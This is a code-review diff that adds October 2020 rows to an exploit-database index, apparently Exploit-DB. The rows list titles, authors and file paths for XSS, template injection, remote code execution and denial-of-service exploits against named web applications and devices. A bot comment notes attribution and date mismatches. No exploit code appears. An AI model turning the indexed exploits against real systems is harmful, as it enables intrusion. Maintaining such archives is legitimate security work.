@ -40762,6 +40762,15 @@ id,file,description,date,author,type,platform,port
|
|||
48941,exploits/php/webapps/48941.txt,"Gym Management System 1.0 - Stored Cross Site Scripting",2020-10-23,"Jyotsna Adhana",webapps,php,
|
||||
48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,
|
||||
48943,exploits/php/webapps/48943.py,"TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated)",2020-10-23,0blio_,webapps,php,
|
||||
48944,exploits/php/webapps/48944.py,"CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection",2020-10-26,"Gurkirat Singh",webapps,php,
|
||||
48945,exploits/php/webapps/48945.txt,"Online Health Care System 1.0 - Multiple Cross Site Scripting (Stored)",2020-10-26,"Akıner Kısa",webapps,php,
|
||||
48946,exploits/php/webapps/48946.py,"InoERP 0.7.2 - Remote Code Execution (Unauthenticated)",2020-10-26,"Simon Lyhin",webapps,php,
|
||||
48947,exploits/php/webapps/48947.txt,"PDW File Browser 1.3 - 'new_filename' Cross-Site Scripting (XSS)",2020-10-26,"David Bimmel",webapps,php,
|
||||
48948,exploits/hardware/webapps/48948.txt,"Genexis Platinum-4410 - 'SSID' Persistent XSS",2020-10-26,"Amal Mohandas",webapps,hardware,
|
||||
48949,exploits/hardware/webapps/48949.txt,"ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure",2020-10-26,LiquidWorm,webapps,hardware,
|
||||
48950,exploits/hardware/webapps/48950.txt,"ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure",2020-10-26,LiquidWorm,webapps,hardware,
|
||||
48951,exploits/hardware/webapps/48951.txt,"ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service",2020-10-26,LiquidWorm,webapps,hardware,
|
||||
48952,exploits/hardware/webapps/48952.txt,"ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated)",2020-10-26,LiquidWorm,webapps,hardware,
|
||||
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
|
||||
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
|
||||
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
|
||||
|
|
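Review bot: The new row for 48946 credits `Simon Lyhin` while the file's header says `# Exploit Author: Lyhin's Lab`; the index and the file should agree on attribution. The 48944 row records 2020-10-26 while that file's header says `# Date: 11/10/2017`; if the column is the publication date rather than the discovery date, that is fine, but it is worth confirming since the other new rows reuse the file's own date. The 48947 description reads `PDW File Browser 1.3` where the file title says `<= v1.3`, which loses the "and earlier" qualifier.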